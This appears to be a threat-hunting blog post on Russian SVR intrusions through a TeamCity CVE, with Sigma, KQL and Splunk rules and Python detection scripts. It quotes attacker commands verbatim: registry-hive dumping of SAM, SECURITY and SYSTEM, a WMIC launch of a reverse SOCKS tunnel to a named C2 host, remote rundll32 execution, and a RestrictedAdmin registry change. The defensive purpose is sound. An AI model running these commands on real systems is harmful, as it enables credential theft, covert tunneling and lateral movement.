Hunting SVR — Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally


Behavior Patterns

SVR cyber operations pose a persistent threat to public and private organizations' networks globally. Since 2013, cybersecurity companies and governments have reported on SVR operations targeting victim networks to steal confidential and proprietary information. A decade later, the authoring agencies can infer a long-term targeting pattern aimed at collecting, and enabling the collection of, foreign intelligence, a broad concept that for Russia encompasses information on the politics, economics, and military of foreign states; science and technology; and foreign counterintelligence. The SVR also conducts cyber operations targeting technology companies that enable future cyber operations.
…In this newly attributed operation targeting networks hosting TeamCity servers, the SVR demonstrably continues its practice of targeting technology companies. By choosing to exploit CVE-2023-42793 in TeamCity, a software development program, the authoring agencies assess the SVR could benefit from access to victims, particularly by allowing the threat actors to compromise the networks of dozens of software developers. JetBrains issued a patch for this CVE in mid-September 2023, limiting the SVR's operation to the exploitation of unpatched, Internet-reachable TeamCity servers. While the authoring agencies assess the SVR has not yet used its access to software developers to reach customer networks and is likely still in the preparatory phase of its operation, having access to these companies' networks presents the SVR with opportunities to enable hard-to-detect command and control (C2) infrastructure.

This playbook is based on CISA Alert AA23-347A and provides corresponding Sigma rules for threat hunting. It additionally contains a threat-hunting Sigma rule covering living-off-the-land and Active Directory exploitation commands, and one for detecting EDRSandBlast, which the SVR also uses in some cases.

Host Reconnaissance

whoami

Initial observations show the SVR used the following basic, built-in commands to perform host reconnaissance [T1033]:

whoami /priv
whoami /all
whoami /groups
whoami /domain

Privilege information listing via whoami

Sigma-Rules/Privilege information listing via whoami.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

Splunk:

index=* source="WinEventLog:*" AND ((Image="*whoami.exe") AND (CommandLine="*priv*" OR CommandLine="*Priv*"))

Whoami.exe Russian SVR JetBrains

Sigma-Rules/Whoami.exe Russian SVR JetBrains.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

MDE KQL:

DeviceProcessEvents | where ((FolderPath endswith @'\whoami.exe' or InitiatingProcessVersionInfoOriginalFileName =~ @'whoami.exe' or ProcessVersionInfoOriginalFileName =~ @'whoami.exe') and (ProcessCommandLine contains @' /priv' or ProcessCommandLine contains @' /all' or ProcessCommandLine contains @' /groups' or ProcessCommandLine contains @' /domain'))

DC listing via nltest

nltest -dclist
nltest -dsgetdc

Sigma-Rules/DC listing via nltest.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

MDE KQL:

DeviceProcessEvents | where (FolderPath endswith @'nltest.exe' and (ProcessCommandLine matches regex @'(?i).*dclist\:.*|.*DCLIST\:.*|.*dsgetdc\:.*|.*DSGETDC\:.*'))

DLL execution via WMI

Sigma-Rules/DLL execution via WMI.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

MDE KQL:

DeviceProcessEvents | where (FolderPath endswith @'WMIC.exe' and (ProcessCommandLine contains @'call' or ProcessCommandLine contains @'rundll32'))

Splunk:

index=* source="WinEventLog:*" AND ((Image="*WMIC.exe") AND (CommandLine="*call*" OR CommandLine="*rundll32*"))

Process with connect and pass as args

Sigma-Rules/Process with connect and pass as args.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

MDE KQL:

DeviceProcessEvents | where (ProcessCommandLine contains @'pass' and ProcessCommandLine contains @'connect')

Splunk:

index=* source="WinEventLog:*" AND ((CommandLine="*pass*") AND (CommandLine="*connect*"))

Service or Drive enumeration via powershell

Sigma-Rules/Service or Drive enumeration via powershell.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

MDE KQL:

DeviceEvents | where ActionType == "PowerShellCommand" | where (((AdditionalFields contains @'Get-WmiObject' or InitiatingProcessCommandLine contains @'Get-WmiObject') and (AdditionalFields contains @'-Class' or InitiatingProcessCommandLine contains @'-Class') and (AdditionalFields contains @'Win32_Service' or InitiatingProcessCommandLine contains @'Win32_Service')) or ((AdditionalFields contains @'Get-WindowsDriver' or InitiatingProcessCommandLine contains @'Get-WindowsDriver') and (AdditionalFields contains @'-Online' or InitiatingProcessCommandLine contains @'-Online') and (AdditionalFields contains @'-All' or InitiatingProcessCommandLine contains @'-All')))

Splunk:

index=* source="WinEventLog:*" AND (((ScriptBlockText="*Get-WmiObject*") AND (ScriptBlockText="*-Class*") AND (ScriptBlockText="*Win32_Service*")) OR ((ScriptBlockText="*Get-WindowsDriver*") AND (ScriptBlockText="*-Online*") AND (ScriptBlockText="*-All*")))

DLL names used by SVR for GraphicalProton backdoor

GraphicalProton is a simplistic backdoor that uses OneDrive, Dropbox, and randomly generated BMPs [T1027.001] to exchange data with the SVR operator. After execution, GraphicalProton gathers environment information such as active TCP/UDP connections [T1049], running processes [T1049], as well as user, host, and domain names [T1590]. OneDrive is used as the primary communication channel while Dropbox is treated as a backup channel [T1567]. API keys are hardcoded into the malware. When communicating with cloud services, GraphicalProton generates a randomly named directory which is used to store infection-specific BMP files — with both commands and results [T1564.001]. The directory name is re-randomized each time the GraphicalProton process is started.

Sigma-Rules/DLL names used by SVR for GraphicalProton backdoor.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

MDE KQL:

DeviceImageLoadEvents | where (FolderPath endswith @'AclNumsInvertHost.dll' or FolderPath endswith @'ModeBitmapNumericAnimate.dll' or FolderPath endswith @'UnregisterAncestorAppendAuto.dll' or FolderPath endswith @'DeregisterSeekUsers.dll' or FolderPath endswith @'ScrollbarHandleGet.dll' or FolderPath endswith @'PerformanceCaptionApi.dll' or FolderPath endswith @'WowIcmpRemoveReg.dll' or FolderPath endswith @'BlendMonitorStringBuild.dll' or FolderPath endswith @'HandleFrequencyAll.dll' or FolderPath endswith @'HardSwapColor.dll' or FolderPath endswith @'LengthInMemoryActivate.dll' or FolderPath endswith @'ParametersNamesPopup.dll' or FolderPath endswith @'ModeFolderSignMove.dll' or FolderPath endswith @'ChildPaletteConnected.dll' or FolderPath endswith @'AddressResourcesSpec.dll')

Splunk:

index=* source="WinEventLog:*" AND (ImageLoaded="*AclNumsInvertHost.dll" OR ImageLoaded="*ModeBitmapNumericAnimate.dll" OR ImageLoaded="*UnregisterAncestorAppendAuto.dll" OR ImageLoaded="*DeregisterSeekUsers.dll" OR ImageLoaded="*ScrollbarHandleGet.dll" OR ImageLoaded="*PerformanceCaptionApi.dll" OR ImageLoaded="*WowIcmpRemoveReg.dll" OR ImageLoaded="*BlendMonitorStringBuild.dll" OR ImageLoaded="*HandleFrequencyAll.dll" OR ImageLoaded="*HardSwapColor.dll" OR ImageLoaded="*LengthInMemoryActivate.dll" OR ImageLoaded="*ParametersNamesPopup.dll" OR ImageLoaded="*ModeFolderSignMove.dll" OR ImageLoaded="*ChildPaletteConnected.dll" OR ImageLoaded="*AddressResourcesSpec.dll")

Sensitive registry entries saved to file

In order to exfiltrate the Windows Registry, the SVR saved hives into files [T1003.002], packed them, and then exfiltrated them using a backdoor capability. It used "reg save" to save the SYSTEM, SAM and SECURITY registry hives, and used PowerShell to stage .zip archives in the C:\Windows\Temp\ directory:

reg save HKLM\SYSTEM ""C:\Windows\temp\1\sy.sa"" /y
reg save HKLM\SAM ""C:\Windows\temp\1\sam.sa"" /y
reg save HKLM\SECURITY ""C:\Windows\temp\1\se.sa"" /y
powershell Compress-Archive -Path C:\Windows\temp\1\ -DestinationPath C:\Windows\temp\s.zip -Force & del C:\Windows\temp\1 /F /Q

Sigma-Rules/Sensitive registry entries saved to file.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

MDE KQL:

DeviceProcessEvents | where (FolderPath endswith @'reg.exe' and ProcessCommandLine contains @'save' and (ProcessCommandLine matches regex @'(?i).*HKLM\\SYSTEM.*|.*HKLM\\SECURITY.*|.*HKLM\\SAM.*') and (ProcessCommandLine matches regex @'(?i).*sy\.sa.*|.*sam\.sa.*|.*se\.sa.*'))

Compressing files from temp to temp

Sigma-Rules/Compressing files from temp to temp.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

MDE KQL:

DeviceEvents | where ActionType == "PowerShellCommand" | where ((AdditionalFields matches regex @'(?i).*Compress\-Archive.*Path.*Windows\\[Tt]{1}emp\\[1-9]{1}.*DestinationPath.*Windows\\[Tt]{1}emp\\.*') or (InitiatingProcessCommandLine matches regex @'(?i).*Compress\-Archive.*Path.*Windows\\[Tt]{1}emp\\[1-9]{1}.*DestinationPath.*Windows\\[Tt]{1}emp\\.*'))
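As an added example (not code from the post or from the Schmouni242/Sigma-Rules repository), the following Python script re-implements the host-reconnaissance rules (whoami, nltest) and the credential-staging rules (reg save of SYSTEM/SAM/SECURITY to the .sa names, Compress-Archive from Windows\Temp to Windows\Temp) as plain predicate functions, runs them over a handful of constructed Sysmon-style process-creation records, and correlates the hits per host. The sample records, the host and ts fields and the rule names are assumptions; the nltest pattern is deliberately a little broader than the KQL above in that it accepts both the / and - switch forms with or without the trailing colon.

```python
import re
from collections import defaultdict

# Constructed Sysmon Event ID 1-style records, not real telemetry. The field names
# Image/CommandLine mirror the Splunk queries in the post; host/ts are assumed fields.
SAMPLE_EVENTS = [
    {"host": "build01", "ts": "2023-10-02T09:01:00",
     "Image": r"C:\Windows\System32\whoami.exe", "CommandLine": "whoami /priv"},
    {"host": "build01", "ts": "2023-10-02T09:01:05",
     "Image": r"C:\Windows\System32\nltest.exe", "CommandLine": "nltest /dsgetdc:"},
    {"host": "build01", "ts": "2023-10-02T09:03:10",
     "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg save HKLM\SAM ""C:\Windows\temp\1\sam.sa"" /y'},
    {"host": "build01", "ts": "2023-10-02T09:03:11",
     "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg save HKLM\SECURITY ""C:\Windows\temp\1\se.sa"" /y'},
    {"host": "build01", "ts": "2023-10-02T09:03:20",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell Compress-Archive -Path C:\Windows\temp\1\ -DestinationPath C:\Windows\temp\s.zip -Force"},
    # Benign noise on a second host: an admin exporting a different hive to a .bak file.
    {"host": "ws07", "ts": "2023-10-02T10:00:00",
     "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save HKLM\SOFTWARE C:\backup\software.bak /y"},
    {"host": "ws07", "ts": "2023-10-02T10:00:30",
     "Image": r"C:\Windows\System32\whoami.exe", "CommandLine": "whoami"},
]


def _image_is(event, exe):
    """True when the process image path ends with the given executable name (case-insensitive)."""
    return event.get("Image", "").lower().endswith(exe.lower())


def rule_whoami_recon(event):
    """whoami with a privilege/group/domain switch (host reconnaissance, T1033)."""
    cl = event.get("CommandLine", "").lower()
    return _image_is(event, r"\whoami.exe") and any(
        switch in cl for switch in (" /priv", " /all", " /groups", " /domain"))


NLTEST_RE = re.compile(r"(?i)[/-](dclist|dsgetdc)\b")


def rule_nltest_dc(event):
    """nltest domain controller listing; accepts / or - switches, with or without the trailing colon."""
    return _image_is(event, r"\nltest.exe") and NLTEST_RE.search(event.get("CommandLine", "")) is not None


HIVE_RE = re.compile(r"(?i)HKLM\\(SYSTEM|SECURITY|SAM)\b")
SA_FILE_RE = re.compile(r"(?i)\b(sy|sam|se)\.sa\b")


def rule_reg_save_hive(event):
    """reg save of SYSTEM/SECURITY/SAM into the sy.sa/sam.sa/se.sa names seen in the intrusion (T1003.002)."""
    cl = event.get("CommandLine", "")
    return (_image_is(event, r"\reg.exe") and "save" in cl.lower()
            and HIVE_RE.search(cl) is not None and SA_FILE_RE.search(cl) is not None)


COMPRESS_RE = re.compile(
    r"(?i)Compress-Archive.*-Path.*Windows\\Temp\\[1-9].*-DestinationPath.*Windows\\Temp\\")


def rule_compress_temp(event):
    """PowerShell Compress-Archive staging a numbered subfolder of the Windows Temp directory back into it."""
    return COMPRESS_RE.search(event.get("CommandLine", "")) is not None


RULES = [
    ("whoami_privilege_recon", rule_whoami_recon),
    ("nltest_dc_listing", rule_nltest_dc),
    ("reg_save_sensitive_hive", rule_reg_save_hive),
    ("compress_archive_temp_to_temp", rule_compress_temp),
]


def evaluate(events):
    """Map host -> {rule name -> matching command lines} over the event stream."""
    hits = defaultdict(lambda: defaultdict(list))
    for event in events:
        for name, predicate in RULES:
            if predicate(event):
                hits[event["host"]][name].append(event["CommandLine"])
    return {host: dict(rules) for host, rules in hits.items()}


def distinct_rules_per_host(events):
    """How many different rules fired on each host; several weak signals on one host outrank one."""
    return {host: len(rules) for host, rules in evaluate(events).items()}


def hosts_with_dump_sequence(events):
    """Hosts where hive dumping AND temp-to-temp staging both fired, i.e. the full chain in the post."""
    return sorted(host for host, rules in evaluate(events).items()
                  if "reg_save_sensitive_hive" in rules and "compress_archive_temp_to_temp" in rules)


if __name__ == "__main__":
    for host, rules in evaluate(SAMPLE_EVENTS).items():
        print(host)
        for name, lines in rules.items():
            for line in lines:
                print(f"  [{name}] {line}")
    print("hive dump + staging on:", hosts_with_dump_sequence(SAMPLE_EVENTS))
```

Running it flags only build01: the admin on ws07 who saved HKLM\SOFTWARE to a .bak file and ran a bare whoami never trips a rule, because the hive rule requires both one of the three sensitive hives and the specific .sa file names, exactly as the KQL above does. The per-host correlation is the part a single Sigma rule cannot express: four different rules firing on one host within a few minutes is a much stronger signal than any of them alone.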

Scheduled tasks names used by SVR for Graphical backdoor

Sigma-Rules/Scheduled tasks names used by SVR for GraphicalProton backdoor command.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

Splunk:

index=* source="WinEventLog:*" AND ((EventCode="4698" OR EventCode="4699" OR EventCode="4702") AND (TaskName="\\Microsoft\\Windows\\IISUpdateService" OR TaskName="\\Microsoft\\Windows\\WindowsDefenderService" OR TaskName="\\Microsoft\\Windows\\WindowsDefenderService2" OR TaskName="\\Microsoft\\DefenderService" OR TaskName="\\Microsoft\\Windows\\DefenderUPDService" OR TaskName="\\Microsoft\\Windows\\WiMSDFS" OR TaskName="\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCkeck" OR TaskName="\\Microsoft\\Windows\\Windows Error Reporting\\SubmitReporting" OR TaskName="\\Microsoft\\Windows\\Windows Defender\\Defender Update Service" OR TaskName="\\WindowUpdate" OR TaskName="\\Microsoft\\Windows\\Windows Error Reporting\\CheckReporting" OR TaskName="\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCheck" OR TaskName="\\Microsoft\\Windows\\Speech\\SpeechModelInstallTask" OR TaskName="\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStart" OR TaskName="\\Microsoft\\Windows\\Data Integrity Scan\\Data Integrity Update" OR TaskName="\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck" OR TaskName="\\Microsoft\\Windows\\ATPUpd" OR TaskName="\\Microsoft\\Windows\\Windows Defender\\Service Update" OR TaskName="\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Check" OR TaskName="\\Defender" OR TaskName="\\defender"))

MDE KQL:

DeviceProcessEvents | where ((FolderPath endswith @'schtasks.exe' and (ProcessCommandLine contains @'IISUpdateService' or ProcessCommandLine contains @'WindowsDefenderService' or ProcessCommandLine contains @'WindowsDefenderService2' or ProcessCommandLine contains @'DefenderService' or ProcessCommandLine contains @'DefenderUPDService' or ProcessCommandLine contains @'WiMSDFS' or ProcessCommandLine contains @'StartupAppTaskCkeck' or ProcessCommandLine contains @'SubmitReporting' or ProcessCommandLine contains @'Defender Update Service' or ProcessCommandLine contains @'WindowUpdate' or ProcessCommandLine contains @'CheckReporting' or ProcessCommandLine contains @'StartupAppTaskCheck' or ProcessCommandLine contains @'SpeechModelInstallTask' or ProcessCommandLine contains @'BfeOnServiceStart' or ProcessCommandLine contains @'Data Integrity Update' or ProcessCommandLine contains @'Scheduled AutoCheck' or ProcessCommandLine contains @'ATPUpd' or ProcessCommandLine contains @'Service Update' or ProcessCommandLine contains @'Scheduled Check' or ProcessCommandLine contains @'Defender' or ProcessCommandLine contains @'defender')) or (FolderPath endswith @'schtasks.exe' and ((ProcessCommandLine matches regex @'(?i).*Defender\sUpdate\sService.*') or (ProcessCommandLine matches regex @'(?i).*Data\sIntegrity\sUpdate.*') or (ProcessCommandLine matches regex @'(?i).*Scheduled\sAutoCheck.*') or (ProcessCommandLine matches regex @'(?i).*Service\sUpdate.*') or (ProcessCommandLine matches regex @'(?i).*Scheduled\sCheck.*'))))

Tactics Used to Avoid Detection

To avoid detection, the SVR used a “Bring Your Own Vulnerable Driver” [T1068] technique to disable or outright kill endpoint detection and response (EDR) and antivirus (AV) software [T1562.001]. This was done using an open source project called “EDRSandBlast.” The authoring agencies have observed the SVR using EDRSandBlast to remove protected process light (PPL) protection, which is used for controlling and protecting running processes and protecting them from infection. The actors then inject code into AV/EDR processes for a small subset of victims [T1068].

Sigma-Rules/EDRSandblast Malicious Driver Detection.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

MDE KQL:

DeviceFileEvents | where (InitiatingProcessFolderPath endswith @'WNBIOS.sys' or InitiatingProcessFolderPath endswith @'ntkrnlmp.pdb' or InitiatingProcessFolderPath endswith @'GDRV.sys' or InitiatingProcessFolderPath endswith @'RTCore64.sys' or InitiatingProcessFolderPath endswith @'DBUtil_2_3.sys')

Splunk:

index=* source="WinEventLog:*" AND (Image="*WNBIOS.sys" OR Image="*ntkrnlmp.pdb" OR Image="*GDRV.sys" OR Image="*RTCore64.sys" OR Image="*DBUtil_2_3.sys")

Further Recon Hunting and Redteaming opportunities

After the SVR built a secure foothold and gained an awareness of a victim's TeamCity server, it then focused on network reconnaissance [T1590.004]. The SVR performed network reconnaissance using a mix of built-in commands and additional tools, such as a port scanner and PowerSploit, which it launched into memory [T1046]. The SVR executed the following PowerSploit commands:
Get-NetComputer  
Get-NetGroup  
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount
Get-NetDiDomain  
Get-AdUser  
Get-DomainUser -UserName  
Get-NetUser -PreauthNotRequire  
Get-NetComputer | select samaccountname  
Get-NetUser -SPN | select serviceprincipalname

Living Off The Land and Exploitation Active Directory

Commands like the ones above are used by threat actors to gather further information about Active Directory before moving laterally. Further commands can be found in the LOLAD project.

The LOLAD and Exploitation project provides a comprehensive collection of Active Directory techniques, commands, and functions that can be used natively to support offensive security operations and Red Team exercises. These techniques leverage AD’s built-in tools to conduct reconnaissance, privilege escalation, and lateral movement, among other tactics. Understanding these methods helps defenders strengthen AD configurations and improve monitoring capabilities.

I have written a Sigma rule for threat hunting that covers all of these commands.

Sigma-Rules/Living Off The Land and Exploitation Active Directory.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

MDE KQL:

DeviceProcessEvents | where (((FolderPath endswith @'\powershell.exe' or FolderPath endswith @'\pwsh.exe' or FolderPath endswith @'\powershell_ise.exe') or ProcessVersionInfoOriginalFileName in~ (@'PowerShell.EXE', @'pwsh.dll')) and (ProcessCommandLine contains @'Get-AD ' or ProcessCommandLine contains @'Get-GPO' or ProcessCommandLine contains @'Search-ADAccount' or ProcessCommandLine contains @'Get-NetGroup' or ProcessCommandLine contains @'Get-NetDomain' or ProcessCommandLine contains @'Get-NetDomainTrust' or ProcessCommandLine contains @'Get-LocalGroupMember' or ProcessCommandLine contains @'Get-NetUser' or ProcessCommandLine contains @'Get-DomainPolicy' or ProcessCommandLine contains @'Get-NetSession' or ProcessCommandLine contains @'Get-DnsServer' or ProcessCommandLine contains @'Get-ADReplicationSubnet' or ProcessCommandLine contains @'Get-EventLog' or ProcessCommandLine contains @'Clear-EventLog' or ProcessCommandLine contains @'Backup-GPO'))

Splunk:

index=* source="WinEventLog:Microsoft-Windows-Sysmon/Operational" AND (((NewProcessName="*\\powershell.exe" OR NewProcessName="*\\pwsh.exe" OR NewProcessName="*\\powershell_ise.exe") OR (OriginalFileName="PowerShell.EXE" OR OriginalFileName="pwsh.dll")) AND (CommandLine="*Get-AD *" OR CommandLine="*Get-GPO*" OR CommandLine="*Search-ADAccount*" OR CommandLine="*Get-NetGroup*" OR CommandLine="*Get-NetDomain*" OR CommandLine="*Get-NetDomainTrust*" OR CommandLine="*Get-LocalGroupMember*" OR CommandLine="*Get-NetUser*" OR CommandLine="*Get-DomainPolicy*" OR CommandLine="*Get-NetSession*" OR CommandLine="*Get-DnsServer*" OR CommandLine="*Get-ADReplicationSubnet*" OR CommandLine="*Get-EventLog*" OR CommandLine="*Clear-EventLog*" OR CommandLine="*Backup-GPO*"))

Tunneling into Compromised Environments

In selected environments the SVR used an additional tool named "rr.exe" — a modified open source reverse SOCKS tunneler named Rsockstun — to establish a tunnel to the C2 infrastructure [T1572]. The authoring agencies are aware of the following infrastructure used in conjunction with "rr.exe":

65.20.97[.]203:443
Poetpages[.]com:8443

The SVR executed Rsockstun either in memory or using the Windows Management Instrumentation Command Line (WMIC) [T1047] utility after dropping it to disk:

wmic process call create "C:\Program Files\Windows Defender Advanced Threat Protection\Sense.exe -connect poetpages.com -pass M554-0sddsf2@34232fsl45t31"

Lateral Movement

The SVR used WMIC to facilitate lateral movement [T1047], [T1210]:

wmic /node:"""" /user:""" /password:"""" process call create ""rundll32 C:\Windows\system32\AclNumsInvertHost.dll AclNumsInvertHost""

The SVR also modified the DisableRestrictedAdmin key to enable remote connections [T1210]. It modified the Registry using the following reg command:

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d "0" /f
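The rules in this post are published as Sigma YAML, and the tunneling and lateral-movement commands just quoted (together with the earlier "Process with connect and pass as args" rule) are a good fit for showing how a Sigma detection block is actually evaluated. The following is an added example, not code from the post or from the Schmouni242/Sigma-Rules repository: a minimal Sigma matcher in Python that supports the |contains, |startswith, |endswith, |re and |all modifiers and conditions built from selection names, and/or/not and parentheses, run against constructed process events built from the commands above. The two rules are written here as the Python dicts that yaml.safe_load would return for a rule's detection block, so no YAML library is needed; the rule titles, the filter_local exclusion and the two benign look-alike events are assumptions made for the demonstration.

```python
import re


def _match_field(value, modifiers, pattern):
    """One Sigma field/value pair, honouring |contains, |startswith, |endswith, |re and |all."""
    if value is None:                      # field absent from the event: never matches
        return False
    text = str(value)
    patterns = pattern if isinstance(pattern, list) else [pattern]
    mode = next((m for m in modifiers if m in ("contains", "startswith", "endswith", "re")), "equals")

    def one(p):
        if mode == "re":
            return re.search(str(p), text) is not None
        p, v = str(p).lower(), text.lower()   # Sigma string matching is case-insensitive
        return {"contains": p in v, "startswith": v.startswith(p),
                "endswith": v.endswith(p), "equals": v == p}[mode]

    results = [one(p) for p in patterns]
    return all(results) if "all" in modifiers else any(results)   # list values are OR unless |all


def _match_selection(selection, event):
    """All field/value pairs inside one selection map must match (AND)."""
    for key, pattern in selection.items():
        field, *modifiers = key.split("|")
        if not _match_field(event.get(field), modifiers, pattern):
            return False
    return True


class _Condition:
    """Recursive-descent evaluator for Sigma conditions: selection names, and/or/not, parentheses."""
    def __init__(self, text, env):
        self.toks, self.env, self.i = re.findall(r"\(|\)|\w+", text), env, 0

    def _peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else None

    def _next(self):
        self.i += 1
        return self.toks[self.i - 1]

    def expr(self):
        value = self.term()
        while self._peek() == "or":
            self._next()
            value = self.term() or value
        return value

    def term(self):
        value = self.factor()
        while self._peek() == "and":
            self._next()
            value = self.factor() and value
        return value

    def factor(self):
        tok = self._next()
        if tok == "not":
            return not self.factor()
        if tok == "(":
            value = self.expr()
            self._next()                   # consume ")"
            return value
        return self.env[tok]               # KeyError: condition names an undefined selection


def sigma_match(rule, event):
    """Evaluate a rule's detection block (as yaml.safe_load would return it) against one event."""
    det = rule["detection"]
    env = {name: _match_selection(sel, event) for name, sel in det.items() if name != "condition"}
    return _Condition(det["condition"], env).expr()


RULES = [
    {"title": "Process with connect and pass as args",
     "detection": {"selection": {"CommandLine|contains|all": ["connect", "pass"]},
                   "condition": "selection"}},
    {"title": "WMIC remote rundll32 or DisableRestrictedAdmin change",
     "detection": {
         "wmic_rundll": {"Image|endswith": "\\wmic.exe",
                         "CommandLine|contains|all": ["process call create", "rundll32"]},
         "restricted_admin": {"Image|endswith": "\\reg.exe",
                              "CommandLine|re": r'(?i)\badd\b.*DisableRestrictedAdmin.*/d\s*"?0"?'},
         # Hypothetical exclusion, only here to exercise "and not": local-only WMIC invocations.
         "filter_local": {"CommandLine|contains": "/node:localhost"},
         "condition": "(wmic_rundll and not filter_local) or restricted_admin"}},
]

# Constructed events built from the commands quoted in the post plus two benign look-alikes.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic process call create "C:\Program Files\Windows Defender Advanced Threat Protection\Sense.exe -connect poetpages.com -pass M554-0sddsf2@34232fsl45t31"'},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic /node:"""" /user:""" /password:"""" process call create ""rundll32 C:\Windows\system32\AclNumsInvertHost.dll AclNumsInvertHost""'},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d "0" /f'},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic /node:localhost process call create "rundll32 printui.dll,PrintUIEntry /?"'},
    {"Image": r"C:\Program Files\Git\usr\bin\ssh.exe",
     "CommandLine": "ssh -p 443 deploy@buildhost.example"},
]


def matching_titles(event):
    """Titles of every rule that fires on the event, in RULES order."""
    return [rule["title"] for rule in RULES if sigma_match(rule, event)]


def hunt(events):
    """(index, titles) for each event that fires at least one rule."""
    return [(i, matching_titles(e)) for i, e in enumerate(events) if matching_titles(e)]


if __name__ == "__main__":
    for i, titles in hunt(SAMPLE_EVENTS):
        print(i, titles, "<-", SAMPLE_EVENTS[i]["CommandLine"][:70])
```

The first three events fire (Rsockstun launch, remote rundll32 of the GraphicalProton DLL, DisableRestrictedAdmin change); the local WMIC call is suppressed by the filter and the ssh command never matches because "connect" is absent. The evaluator covers only the condition grammar these rules need (no "1 of selection*" or aggregation expressions); the point is that Sigma's |contains|all is an AND over list values while a bare list is an OR, which is exactly the difference between the two queries in the "Process with connect and pass as args" section.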

Latest Recommendation October 2024

Russian Intelligence (Wikipedia)

Hunting SVR — Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally was originally published in Detect FYI on Medium, where people are continuing the conversation by highlighting and responding to this story.


Article Link: Hunting SVR — Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally | by SIMKRA | Jan, 2025 | Detect FYI